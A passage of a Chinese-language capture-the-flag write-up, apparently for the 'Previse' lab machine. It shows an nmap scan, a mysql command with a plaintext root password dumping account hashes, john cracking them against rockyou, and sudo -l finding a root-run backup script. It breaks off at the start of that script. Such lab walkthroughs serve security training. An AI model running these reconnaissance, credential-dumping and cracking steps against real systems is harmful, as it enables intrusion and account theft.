─# nmap -A -p- --min-rate=1000 -T4 10.10.11.104 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-12 19:03 PDT Nmap scan report for 10.10.11.104 Host is up (0.52s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 53:ed:44:40:11:6e:8b:da:69:85:79:c0:81:f2:3a:12 (RSA) | 256 bc:54:20:ac:17:23:bb:50:20:f4:e1:6e:62:0f:01:b5 (ECDSA) |_ 256 33:c1:89:ea:59:73:b1:78:84:38:a4:21:10:0c:91:d8 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set | http-title: Previse Login |_Requested resource was login.php |_http-server-header: Apache/2.4.29 (Ubuntu) No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.94SVN%E=4%D=9/12%OT=22%CT=1%CU=42757%PV=Y%DS=2%DC=T%G=Y%TM=66E3 OS:9E0F%P=aarch64-unknown-linux-gnu)SEQ(SP=107%GCD=1%ISR=10E%TI=Z%CI=Z%TS=A OS:)SEQ(SP=107%GCD=1%ISR=10E%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M53AST11NW7%O2=M53A OS:ST11NW7%O3=M53ANNT11NW7%O4=M53AST11NW7%O5=M53AST11NW7%O6=M53AST11)WIN(W1 OS:=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O OS:=M53ANNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N OS:)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A= OS:S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF OS:=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL= OS:G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 3389/tcp) HOP RTT ADDRESS 1 414.58 ms 10.10.16.1 2 587.74 ms 10.10.11.104
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 165.33 seconds
www-data@previse:/var/www/html$ mysql -u root -p'mySQL_p@ssw0rd!:)' -e 'use previse;select * from accounts;' <ssw0rd!:)' -e 'use previse;select * from accounts;' mysql: [Warning] Using a password on the command line interface can be insecure. id username password created_at 1 m4lwhere $1$🧂llol$DQpmdvnb7EeuO6UaqRItf. 2021-05-27 18:18:36 2 admin $1$🧂llol$G3KunFyMrVvsqYP1JpRi70 2024-09-13 02:06:23
拿到 m4lwhere的加盐密码,还要看到他是什么类型的哈希
然后在accounts.php源码找到存储逻辑
Crypt()函数,md5加密来的,于是指定john的爆破格式
1
john hash --wordlist=/home/kali/Desktop/rockyou.txt --format=md5crypt-long
最后拿到密码ilovecody112235!登陆m4lwhere
第一件事sudo -l,找到一个可以用的脚本
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
m4lwhere@previse:~$ sudo -l [sudo] password for m4lwhere: User m4lwhere may run the following commands on previse: (root) /opt/scripts/access_backup.sh m4lwhere@previse:~$ ls -l /opt/scripts/access_backup.sh -rwxr-xr-x 1 root root 486 Jun 6 2021 /opt/scripts/access_backup.sh m4lwhere@previse:~$ cat /opt/scripts/access_backup.sh #!/bin/bash
# We always make sure to store logs, we take security SERIOUSLY here
# I know I shouldnt run this as root but I cant figure it out programmatically on my account # This is configured to run with cron, added to sudo so I can run as needed - we'll fix it later when there's time
